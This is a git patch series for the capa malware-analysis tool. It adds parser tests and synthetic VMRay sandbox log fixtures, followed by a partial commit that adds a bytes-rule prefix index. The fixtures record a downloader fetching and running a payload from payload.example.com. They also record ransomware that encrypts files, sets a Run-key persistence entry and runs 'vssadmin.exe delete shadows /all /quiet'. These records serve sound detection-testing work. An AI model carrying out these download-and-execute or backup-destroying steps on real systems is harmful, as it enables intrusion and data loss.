structural assertions New resilience tests: - garbled / truncated event lines are silently skipped (5 variants) - Process block with no Thread: block yields no processes - UTF-8 BOM prefix is accepted New round-trip test: - parse -> extract features -> verify API/String/Number feature counts --- .../vmray/flog_txt/crlf_endings.flog.txt | 29 ++ .../vmray/flog_txt/format_variance.flog.txt | 74 +++ tests/test_vmray_flog_txt.py | 434 ++++++++++++++++-- 3 files changed, 507 insertions(+), 30 deletions(-) create mode 100644 tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt create mode 100644 tests/fixtures/vmray/flog_txt/format_variance.flog.txt diff --git a/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt new file mode 100644 index 0000000000..cf120d9e6e --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt @@ -0,0 +1,29 @@ +# Log Creation Date: 06.03.2025 09:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x0500" +os_parent_pid = "0x0004" +parent_id = "0" +image_name = "downloader.exe" +filename = "c:\users\admin\downloader.exe" +cmd_line = "downloader.exe" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x0501" + [0001.000] InternetOpenA (lpszAgent="WinInet", dwAccessType=0x0, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c0000 + [0001.001] InternetConnectA (hInternet=0x4c0000, lpszServerName="payload.example.com", nServerPort=0x50, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c0004 + [0001.002] HttpOpenRequestA (hConnect=0x4c0004, lpszVerb="GET", lpszObjectName="/stage2.bin", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c0008 + [0001.003] HttpSendRequestA (hRequest=0x4c0008, lpszHeaders=NULL, dwHeadersLength=0x0, lpOptional=NULL, dwOptionalLength=0x0) returned 0x1 + [0001.004] InternetReadFile (hFile=0x4c0008, lpBuffer=0x20000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x30000) returned 0x1 + [0001.005] CreateFileA (lpFileName="C:\Windows\Temp\svchost32.exe", dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x60 + [0001.006] WriteFile (hFile=0x60, lpBuffer=0x20000, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x40000, lpOverlapped=NULL) returned 0x1 + [0001.007] WinExec (lpCmdLine="C:\Windows\Temp\svchost32.exe", uCmdShow=0x0) returned 0x21 diff --git a/tests/fixtures/vmray/flog_txt/format_variance.flog.txt b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt new file mode 100644 index 0000000000..473ec0b51f --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt @@ -0,0 +1,74 @@ +# Log Creation Date: 05.03.2025 14:22:07 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "0001" +os_pid = "0x00000ABC" +os_parent_pid = "0x0004" +parent_id = "0000" +image_name = "ransomware.exe" +filename = "c:\\users\\victim\\desktop\\ransomware.exe" +cmd_line = "\"c:\\users\\victim\\desktop\\ransomware.exe\" --silent" +monitor_reason = "analysis_target" + +Region: +id = "0010" +name = "private_0x0000000000010000" + +Thread: +id = "0001" +os_tid = "0x00001B00" + [0001.000] GetCurrentProcess () returned 0xFFFFFFFFFFFFFFFF + [0001.001] CryptAcquireContextW (phProv=0x2000, szContainer=NULL, szProvider=NULL, dwProvType=24, dwFlags=0xF0000000) returned 1 + [0001.002] CryptGenRandom (hProv=0x2000, dwLen=16, pbBuffer=0x3000) returned 1 + [0001.003] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\important.docx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x00000054 + [0001.004] ReadFile (hFile=0x54, lpBuffer=0x4000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x5000, lpOverlapped=NULL) returned 1 + [0001.005] WriteFile (hFile=0x54, lpBuffer=0x6000, nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x7000, lpOverlapped=NULL) returned 1 + [0001.006] CloseHandle (hObject=0x54) returned 1 + [0001.007] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\important.docx", lpNewFileName="C:\\Users\\victim\\Documents\\important.docx.locked", dwFlags=0x1) returned 1 + [0001.008] RegOpenKeyExW (hKey=2147483650, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0, samDesired=131097) returned 0 + [0001.009] RegSetValueExW (hKey=0x100, lpValueName="WindowsDefender", Reserved=0, dwType=1, lpData="C:\\Users\\victim\\Desktop\\ransomware.exe") returned 0 + [0001.010] DeleteFileW (lpFileName="C:\\Windows\\System32\\vssadmin.exe") returned 0x80070005 + [0001.011] CreateProcessW (lpApplicationName=NULL, lpCommandLine="vssadmin.exe delete shadows /all /quiet", dwCreationFlags=8, lpEnvironment=NULL, lpCurrentDirectory=NULL, lpStartupInfo=0x8000, lpProcessInformation=0x9000) returned 1 + [0001.012] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0)", dwAccessType=1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0) returned 0x4c9804 + [0001.013] InternetOpenUrlW (hInternet=0x4c9804, lpszUrl="http://ransom.example.com/key?id=ABCDEF0123456789", dwHeadersLength=0, dwFlags=0x80000000, dwContext=0) returned 0x4c9808 + [0001.014] HttpSendRequestW (hRequest=0x4c9808, lpszHeaders=NULL, dwHeadersLength=0, lpOptional=NULL, dwOptionalLength=0) returned 1 + [0001.015] CoTaskMemFree (pv=0x746aa0) + [0001.016] GetSystemInfo (lpSystemInfo=0x1000) + [0001.017] WaitForSingleObject (hHandle=0x200, dwMilliseconds=4294967295) returned 0x0 + [0001.018] ExitProcess (uExitCode=0) + +Thread: +id = "0002" +os_tid = "0x00001B01" + [0002.000] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=3, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x55 + [0002.001] ReadFile (hFile=0x55, lpBuffer=0x10000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x11000, lpOverlapped=NULL) returned 1 + [0002.002] CryptEncrypt (hKey=0x3000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10000, pdwDataLen=0x12000, dwBufLen=4096) returned 1 + [0002.003] WriteFile (hFile=0x55, lpBuffer=0x10000, nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x13000, lpOverlapped=NULL) returned 1 + [0002.004] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", lpNewFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked", dwFlags=1) returned 1 + [0002.005] FindFirstFileW (lpFileName="C:\\Users\\victim\\*", lpFindFileData=0x14000) returned 0x56 + [0002.006] FindNextFileW (hFindFile=0x56, lpFindFileData=0x14000) returned 1 + [0002.007] CreateFileW (lpFileName="C:\\Users\\victim\\README_DECRYPT.txt", dwDesiredAccess=1073741824, dwShareMode=0, lpSecurityAttributes=NULL, dwCreationDisposition=2, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x57 + [0002.008] WriteFile (hFile=0x57, lpBuffer=0x15000, nNumberOfBytesToWrite=512, lpNumberOfBytesWritten=0x16000, lpOverlapped=NULL) returned 1 + +Process: +id = "0002" +os_pid = "0x00000BCE" +os_parent_pid = "0x00000ABC" +parent_id = "0001" +image_name = "vssadmin.exe" +filename = "c:\\windows\\system32\\vssadmin.exe" +cmd_line = "vssadmin.exe delete shadows /all /quiet" +monitor_reason = "child_process" + +Region: +id = "0020" +name = "private_0x0000000000020000" + +Thread: +id = "0003" +os_tid = "0x00002C00" + [0003.000] NtQuerySystemInformation (SystemInformationClass=0x5, SystemInformation=0x20000, SystemInformationLength=0x1000, ReturnLength=0x21000) returned 0x0 + [0003.001] OpenProcess (dwDesiredAccess=0x1F0FFF, bInheritHandle=0, dwProcessId=2748) returned 0x58 + [0003.002] VssDeleteSnapshots (pwszObjectName=NULL, eSourceObjectType=0x0, bForceDelete=TRUE) returned 0x80042302 diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py index 133d286fb5..9937703cce 100644 --- a/tests/test_vmray_flog_txt.py +++ b/tests/test_vmray_flog_txt.py @@ -18,10 +18,11 @@ import pytest -import capa.features.common import capa.features.insn +import capa.features.common from capa.exceptions import UnsupportedFormatError from capa.features.extractors.vmray import flog_txt +from capa.features.extractors.vmray.flog_txt import _parse_args, _parse_event, _parse_hex_or_decimal from capa.features.extractors.vmray.extractor import VMRayExtractor # Fixture files live in tests/fixtures/vmray/flog_txt/ (committed to the main repo so they @@ -92,9 +93,7 @@ def test_parse_flog_txt_minimal(tmp_path): def test_parse_flog_txt_rejects_wrong_header(): - with pytest.raises( - UnsupportedFormatError, match="does not appear to be a VMRay flog.txt" - ): + with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"): flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") @@ -114,9 +113,7 @@ def test_parse_flog_txt_sys_prefix_stripped(tmp_path): def test_vmray_analysis_from_flog_txt(tmp_path): path = tmp_path / "flog.txt" - path.write_bytes( - MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") - ) + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) from capa.features.extractors.vmray import VMRayAnalysis analysis = VMRayAnalysis.from_flog_txt(path) @@ -132,9 +129,7 @@ def test_vmray_extractor_from_flog_txt(tmp_path): from capa.features.address import NO_ADDRESS path = tmp_path / "flog.txt" - path.write_bytes( - MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") - ) + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) ext = VMRayExtractor.from_flog_txt(path) assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt procs = list(ext.get_processes()) @@ -249,9 +244,7 @@ def test_windows_flog_txt_api_features(windows_apis_extractor): "GetAddrInfoW", "GetComputerNameW", ): - assert ( - capa.features.insn.API(api_name) in features - ), f"API({api_name!r}) not found" + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" def test_windows_flog_txt_string_args(windows_apis_extractor): @@ -280,19 +273,14 @@ def test_windows_flog_txt_string_args(windows_apis_extractor): # GetComputerNameW result (child process) "DESKTOP-TEST01", ): - assert ( - capa.features.common.String(expected_string) in features - ), f"String({expected_string!r}) not found" + assert capa.features.common.String(expected_string) in features, f"String({expected_string!r}) not found" def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor): """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features.""" features = _collect_all_call_features(windows_apis_extractor) # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash - assert ( - capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") - not in features - ) + assert capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") not in features def test_windows_flog_txt_number_args(windows_apis_extractor): @@ -354,9 +342,7 @@ def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor): "sendto", "recvfrom", ): - assert ( - capa.features.insn.API(stripped_name) in features - ), f"API({stripped_name!r}) not found after stripping" + assert capa.features.insn.API(stripped_name) in features, f"API({stripped_name!r}) not found after stripping" def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor): @@ -387,9 +373,7 @@ def string_edge_cases_extractor(): def test_edge_case_paths_with_spaces(string_edge_cases_extractor): """File paths containing spaces are parsed correctly.""" features = _collect_all_call_features(string_edge_cases_extractor) - assert ( - capa.features.common.String("C:\\path with spaces\\file name.txt") in features - ) + assert capa.features.common.String("C:\\path with spaces\\file name.txt") in features def test_edge_case_unc_path(string_edge_cases_extractor): @@ -407,10 +391,7 @@ def test_edge_case_url_string(string_edge_cases_extractor): def test_edge_case_registry_key(string_edge_cases_extractor): """Registry key paths are normalised to single backslashes.""" features = _collect_all_call_features(string_edge_cases_extractor) - assert ( - capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") - in features - ) + assert capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") in features def test_edge_case_numeric_args(string_edge_cases_extractor): @@ -422,3 +403,396 @@ def test_edge_case_numeric_args(string_edge_cases_extractor): assert capa.features.insn.Number(4096) in features # WriteProcessMemory nSize=4096 assert capa.features.insn.Number(4096) in features + + +# --------------------------------------------------------------------------- +# _parse_hex_or_decimal parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "raw, expected", + [ + ("0", 0), + ("1", 1), + ("255", 255), + ("4294967295", 4294967295), + ("0x0", 0), + ("0xff", 255), + ("0xFF", 255), + ("0xDEADbeef", 0xDEADBEEF), + ("0xffffffffffffffff", 0xFFFFFFFFFFFFFFFF), + ("0x80070005", 0x80070005), + # leading/trailing whitespace is stripped + (" 0x10 ", 0x10), + # quoted values are unquoted before parsing + ('"0x20"', 0x20), + # empty string → 0 + ("", 0), + # negative decimal (Python int() accepts it) + ("-1", -1), + ], +) +def test_parse_hex_or_decimal_valid(raw, expected): + assert _parse_hex_or_decimal(raw) == expected + + +@pytest.mark.parametrize("raw", ["NULL", "TRUE", "FALSE", "INVALID_HANDLE_VALUE", "abc"]) +def test_parse_hex_or_decimal_invalid_raises(raw): + with pytest.raises((ValueError, TypeError)): + _parse_hex_or_decimal(raw) + + +# --------------------------------------------------------------------------- +# _parse_event parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "line, expected_api, expected_rv", + [ + # basic no-arg call with hex return value + ("[0072.750] GetCurrentProcess () returned 0xffffffffffffffff", "GetCurrentProcess", 0xFFFFFFFFFFFFFFFF), + # uppercase hex return value (mixed case) + ("[0001.000] GetCurrentProcess () returned 0xFFFFFFFF", "GetCurrentProcess", 0xFFFFFFFF), + # HRESULT-style error code + ("[0001.010] DeleteFileW () returned 0x80070005", "DeleteFileW", 0x80070005), + # no return value at all (line ends after closing paren) + ("[0083.567] CoTaskMemFree (pv=0x746aa0)", "CoTaskMemFree", None), + # decimal return value + ("[0001.003] ExitProcess (uExitCode=0) returned 0", "ExitProcess", 0), + # leading zeros in timestamp major/minor + ("[0001.000] NtCreateFile () returned 0x0", "NtCreateFile", 0), + # large timestamp + ("[9999.999] LongRunningOp () returned 0x1", "LongRunningOp", 1), + ], +) +def test_parse_event_valid(line, expected_api, expected_rv): + result = _parse_event(line) + assert result is not None + api_name, _args, rv = result + assert api_name == expected_api + assert rv == expected_rv + + +@pytest.mark.parametrize( + "line", + [ + # does not start with '[' + "GetCurrentProcess () returned 0x1", + # comment / header line + "# Flog Txt Version 1", + # blank line + "", + # property line (key = value) + 'id = "1"', + # bracket never closed + "[0001.000 GetCurrentProcess () returned 0x1", + # section header + "Process:", + "Thread:", + "Region:", + ], +) +def test_parse_event_rejects_non_event_lines(line): + assert _parse_event(line) is None + + +# --------------------------------------------------------------------------- +# _parse_args parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "args_str, expected_names", + [ + # empty / whitespace-only → None + ("", None), + (" ", None), + # only symbolic constants (NULL, TRUE) → no parseable params → None + ("lpszProxyName=NULL, lpszProxyBypass=NULL", None), + # string arg only + ('lpszAgent="WinInet"', ["lpszAgent"]), + # numeric hex arg + ("dwDesiredAccess=0x80000000", ["dwDesiredAccess"]), + # numeric decimal arg + ("dwLen=16", ["dwLen"]), + # mixed: string + hex + decimal + symbolic (symbolic skipped) + ('lpFileName="test.exe", dwAccess=0x80000000, count=4096, hTemplate=NULL', ["lpFileName", "dwAccess", "count"]), + # mixed-case hex is accepted + ("addr=0xDEADbeef", ["addr"]), + ], +) +def test_parse_args_param_names(args_str, expected_names): + result = _parse_args(args_str) + if expected_names is None: + assert result is None + else: + assert result is not None + names = [p.name for p in result.params] + assert names == expected_names + + +def test_parse_args_string_value_stored_in_deref(): + result = _parse_args('lpFileName="hello.txt"') + assert result is not None + assert len(result.params) == 1 + p = result.params[0] + assert p.type_ == "void_ptr" + assert p.deref is not None + assert p.deref.type_ == "str" + assert p.deref.value == "hello.txt" + + +def test_parse_args_numeric_type(): + result = _parse_args("dwSize=4096, hKey=0x80000001") + assert result is not None + names = {p.name: p for p in result.params} + assert names["dwSize"].type_ == "unsigned_32bit" + assert names["dwSize"].value == "4096" + assert names["hKey"].type_ == "unsigned_32bit" + assert names["hKey"].value == "0x80000001" + + +# --------------------------------------------------------------------------- +# Malformed-input resilience tests +# --------------------------------------------------------------------------- + + +_HEADER = b"# Flog Txt Version 1\n\n" +_PROCESS_HEADER = ( + b"Process:\n" + b'id = "1"\n' + b'os_pid = "0x1000"\n' + b'parent_id = "0"\n' + b'os_parent_pid = "0"\n' + b'image_name = "sample.exe"\n' + b'filename = "sample.exe"\n' + b'cmd_line = ""\n' + b'monitor_reason = "analysis_target"\n\n' +) +_THREAD_HEADER = b'Thread:\nid = "1"\nos_tid = "0x2000"\n' + + +@pytest.mark.parametrize( + "extra_lines", + [ + # completely garbled event lines are silently skipped + b"not a valid event line\n", + b"[broken bracket\n", + b"[0001.000 missing closing bracket] Func () returned 0x1\n", + # comment inside thread block is skipped + b"# stray comment\n [0001.000] GetCurrentProcess () returned 0x1\n", + # blank lines inside thread block + b"\n\n [0001.000] GetCurrentProcess () returned 0x1\n", + ], +) +def test_malformed_event_lines_do_not_crash(tmp_path, extra_lines): + path = tmp_path / "flog.txt" + path.write_bytes(_HEADER + _PROCESS_HEADER + _THREAD_HEADER + extra_lines) + flog = flog_txt.parse_flog_txt_path(path) + assert flog.analysis.log_version == "1" + + +def test_process_block_without_thread_is_skipped(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(_HEADER + b"Process:\n" + b'id = "1"\nos_pid = "0x1000"\nimage_name = "x.exe"\n') + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.monitor_processes) == 0 + + +def test_bom_prefix_is_accepted(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(b"\xef\xbb\xbf" + _HEADER + _PROCESS_HEADER + _THREAD_HEADER) + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.monitor_processes) == 1 + + +# --------------------------------------------------------------------------- +# format_variance.flog.txt — real-world format diversity fixture +# --------------------------------------------------------------------------- +# This fixture exercises: zero-padded hex IDs, decimal-only arguments alongside +# symbolic constants, mixed-case hex return values, multiple threads in one +# process, HRESULT-style error codes as return values, and no-return-value calls. + + +@pytest.fixture(scope="module") +def format_variance_extractor(): + path = FLOG_TXT_FIXTURES / "format_variance.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_format_variance_process_and_thread_count(format_variance_extractor): + procs = list(format_variance_extractor.get_processes()) + assert len(procs) == 2 + thread_counts = [len(list(format_variance_extractor.get_threads(p))) for p in procs] + # first process has two threads, second has one + assert sorted(thread_counts) == [1, 2] + + +def test_format_variance_leading_zero_pid_parsed(format_variance_extractor): + procs = list(format_variance_extractor.get_processes()) + pids = {p.inner.pid for p in procs} + # os_pid = "0x00000ABC" → 0xABC = 2748 + assert 0xABC in pids + + +def test_format_variance_api_features(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + for api_name in ( + "CreateFileW", + "ReadFile", + "WriteFile", + "MoveFileExW", + "RegOpenKeyExW", + "RegSetValueExW", + "CryptAcquireContextW", + "CryptGenRandom", + "CryptEncrypt", + "InternetOpenW", + "InternetOpenUrlW", + "CreateProcessW", + "FindFirstFileW", + "FindNextFileW", + "NtQuerySystemInformation", + "OpenProcess", + "CloseHandle", + "WaitForSingleObject", + "ExitProcess", + ): + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" + + +def test_format_variance_string_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + for expected in ( + "C:\\Users\\victim\\Documents\\important.docx", + "C:\\Users\\victim\\Documents\\important.docx.locked", + "C:\\Users\\victim\\Documents\\spreadsheet.xlsx", + "C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked", + "C:\\Users\\victim\\README_DECRYPT.txt", + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "WindowsDefender", + "C:\\Users\\victim\\Desktop\\ransomware.exe", + "Mozilla/4.0 (compatible; MSIE 8.0)", + "http://ransom.example.com/key?id=ABCDEF0123456789", + "vssadmin.exe delete shadows /all /quiet", + ): + assert capa.features.common.String(expected) in features, f"String({expected!r}) not found" + + +def test_format_variance_decimal_only_numeric_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # RegOpenKeyExW: hKey=2147483650 (decimal), ulOptions=0, samDesired=131097 (decimal) + assert capa.features.insn.Number(2147483650) in features + assert capa.features.insn.Number(131097) in features + # CryptAcquireContextW: dwProvType=24 (decimal) + assert capa.features.insn.Number(24) in features + # WaitForSingleObject: dwMilliseconds=4294967295 (decimal INFINITE) + assert capa.features.insn.Number(4294967295) in features + + +def test_format_variance_mixed_case_hex_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # CryptAcquireContextW dwFlags=0xF0000000 (uppercase hex digits in fixture) + assert capa.features.insn.Number(0xF0000000) in features + + +def test_format_variance_no_returnvalue_calls_parsed(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # CoTaskMemFree and GetSystemInfo have no "returned" clause in the fixture + assert capa.features.insn.API("CoTaskMemFree") in features + assert capa.features.insn.API("GetSystemInfo") in features + + +def test_format_variance_child_process_present(format_variance_extractor): + features = _collect_call_features_for_process(format_variance_extractor, "vssadmin.exe") + assert capa.features.insn.API("NtQuerySystemInformation") in features + assert capa.features.insn.API("OpenProcess") in features + + +# --------------------------------------------------------------------------- +# crlf_endings.flog.txt — Windows CRLF line endings +# --------------------------------------------------------------------------- + + +@pytest.fixture(scope="module") +def crlf_extractor(): + path = FLOG_TXT_FIXTURES / "crlf_endings.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_crlf_process_parsed(crlf_extractor): + procs = list(crlf_extractor.get_processes()) + assert len(procs) == 1 + assert procs[0].inner.image_name == "downloader.exe" + + +def test_crlf_api_features(crlf_extractor): + features = _collect_all_call_features(crlf_extractor) + for api_name in ( + "InternetOpenA", + "InternetConnectA", + "HttpOpenRequestA", + "HttpSendRequestA", + "InternetReadFile", + "CreateFileA", + "WriteFile", + "WinExec", + ): + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" + + +def test_crlf_string_args(crlf_extractor): + features = _collect_all_call_features(crlf_extractor) + assert capa.features.common.String("WinInet") in features + assert capa.features.common.String("payload.example.com") in features + assert capa.features.common.String("GET") in features + assert capa.features.common.String("/stage2.bin") in features + assert capa.features.common.String("C:\\Windows\\Temp\\svchost32.exe") in features + + +# --------------------------------------------------------------------------- +# Round-trip test: parse → extract features → verify counts and spot-checks +# --------------------------------------------------------------------------- + + +def test_round_trip_feature_count(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b"Process:\n" + b'id = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample.exe"\nfilename = "sample.exe"\ncmd_line = ""\n' + b'monitor_reason = "analysis_target"\n\n' + b"Thread:\n" + b'id = "1"\nos_tid = "0x2000"\n' + b' [0001.000] CreateFileW (lpFileName="secret.txt", dwDesiredAccess=0x80000000) returned 0x4\n' + b" [0001.001] ReadFile (hFile=0x4, lpBuffer=0x5000, nNumberOfBytesToRead=512) returned 0x1\n" + b" [0001.002] CloseHandle (hObject=0x4) returned 0x1\n" + b" [0001.003] GetCurrentProcess () returned 0xffffffffffffffff\n" + ) + ext = VMRayExtractor.from_flog_txt(path) + procs = list(ext.get_processes()) + assert len(procs) == 1 + + threads = list(ext.get_threads(procs[0])) + assert len(threads) == 1 + + calls = list(ext.get_calls(procs[0], threads[0])) + assert len(calls) == 4 + + features = _collect_all_call_features(ext) + + # spot-check: API names + assert capa.features.insn.API("CreateFileW") in features + assert capa.features.insn.API("ReadFile") in features + assert capa.features.insn.API("CloseHandle") in features + assert capa.features.insn.API("GetCurrentProcess") in features + + # spot-check: string arg from CreateFileW + assert capa.features.common.String("secret.txt") in features + + # spot-check: numeric args + assert capa.features.insn.Number(0x80000000) in features + assert capa.features.insn.Number(512) in features From 0b0d1aff08ce7f0e2bfab8fc3d9c5fd7d22de6a3 Mon Sep 17 00:00:00 2001 From: devs6186 Date: Fri, 20 Mar 2026 02:50:27 +0530 Subject: [PATCH 5/7] rules: add 4-byte prefix index for bytes rule candidate selection Replace the linear scan of all bytes rules with a prefix-bucketed lookup. At index time, each bytes pattern is hashed by its first 4 bytes into a dict bucket; at match time, extracted bytes features probe only matching buckets instead of scanning every rule. Patterns shorter than 4 bytes fall back to a linear scan. Also precompute the rule topological-order index at RuleSet construction time instead of rebuilding it on every _match() call, and add a stale cache structure guard in cache.py for _RuleFeatureIndex shape changes. Closes #2128 --- CHANGELOG.md | 1 + capa/rules/__init__.py | 75 ++++++++++++++++++------ capa/rules/cache.py | 16 ++++- tests/test_match.py | 129 +++++++++++++++++++++++++++++++++++++++++ 4 files changed, 200 insertions(+), 21 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 636f864436..d81b20a96c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -52,6 +52,7 @@ - doc: document that default output shows top-level matches only; -v/-vv show nested matches @devs6186 #1410 - doc: fix typo in usage.md, add documentation links to README @devs6186 #2274 +- rules: pre-filter bytes rule candidates by shared 4-byte prefixes to reduce hot-path bytes scanning @devs6186 #2128 - ci: deprecate macos-13 runner and use Python v3.13 for testing @mike-hunhoff #2777 ### Raw diffs diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index da0a7d0360..e50235feb6 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -18,6 +18,7 @@ import re import copy import uuid +import struct import logging import binascii import collections @@ -56,6 +57,12 @@ logger = logging.getLogger(__name__) +# Fixed prefix size used to pre-filter extracted bytes features. +# This narrows candidate selection from all extracted bytes to those +# sharing a common 4-byte prefix while keeping the implementation simple. +# See: https://github.com/mandiant/capa/issues/2128 +_BYTES_PREFIX_SIZE = 4 + # these are the standard metadata fields, in the preferred order. # when reformatted, any custom keys will come after these. META_KEYS = ( @@ -1440,6 +1447,9 @@ def __init__( self.rules = {rule.name: rule for rule in rules} self.rules_by_namespace = index_rules_by_namespace(rules) self.rules_by_scope = {scope: self._get_rules_for_scope(rules, scope) for scope in scopes} + self._rule_indexes_by_scopes = { + scope: {rule.name: i for i, rule in enumerate(self.rules_by_scope[scope])} for scope in scopes + } # these structures are unstable and may change before the next major release. scores_by_rule: dict[str, int] = {} @@ -1639,8 +1649,14 @@ class _RuleFeatureIndex: # All these features will be evaluated whenever a String feature is encountered. string_rules: dict[str, list[Feature]] # Mapping from rule name to list of Bytes features that have to match. - # All these features will be evaluated whenever a Bytes feature is encountered. + # Retained for logging and existing tests; candidate selection uses the prefix structures below. bytes_rules: dict[str, list[Feature]] + # Mapping from 4-byte prefix (as big-endian uint32) to list of (rule_name, pattern) pairs. + # Built once at index time so _match() can bucket-lookup instead of scanning all bytes rules. + bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] + # Rules whose patterns are shorter than _BYTES_PREFIX_SIZE bytes. + # These cannot be bucketed by prefix and require a linear scan fallback. + bytes_short_rules: list[tuple[str, bytes]] # this routine is unstable and may change before the next major release. @staticmethod @@ -1793,6 +1809,8 @@ def and_score_key(item): # Ideally we find a way to get rid of all of these, eventually. string_rules: dict[str, list[Feature]] = {} bytes_rules: dict[str, list[Feature]] = {} + bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] = collections.defaultdict(list) + bytes_short_rules: list[tuple[str, bytes]] = [] for rule in rules: rule_name = rule.meta["name"] @@ -1826,6 +1844,14 @@ def and_score_key(item): if bytes_features: bytes_rules[rule_name] = cast(list[Feature], bytes_features) + for bytes_feature in bytes_features: + assert isinstance(bytes_feature.value, bytes) + pattern = bytes_feature.value + if len(pattern) >= _BYTES_PREFIX_SIZE: + prefix = struct.unpack_from(">I", pattern)[0] + bytes_prefix_rules[prefix].append((rule_name, pattern)) + else: + bytes_short_rules.append((rule_name, pattern)) for feature in hashable_features: rules_by_feature[feature].add(rule_name) @@ -1839,7 +1865,9 @@ def and_score_key(item): "indexing: %d scanning string features, %d scanning bytes features", len(string_rules), len(bytes_rules) ) - return RuleSet._RuleFeatureIndex(rules_by_feature, string_rules, bytes_rules) + return RuleSet._RuleFeatureIndex( + rules_by_feature, string_rules, bytes_rules, dict(bytes_prefix_rules), bytes_short_rules + ) @staticmethod def _get_rules_for_scope(rules, scope) -> list[Rule]: @@ -1929,11 +1957,10 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea """ feature_index: RuleSet._RuleFeatureIndex = self._feature_indexes_by_scopes[scope] - rules: list[Rule] = self.rules_by_scope[scope] # Topologic location of rule given its name. # That is, rules with a lower index should be evaluated first, since their dependencies # will be evaluated later. - rule_index_by_rule_name = {rule.name: i for 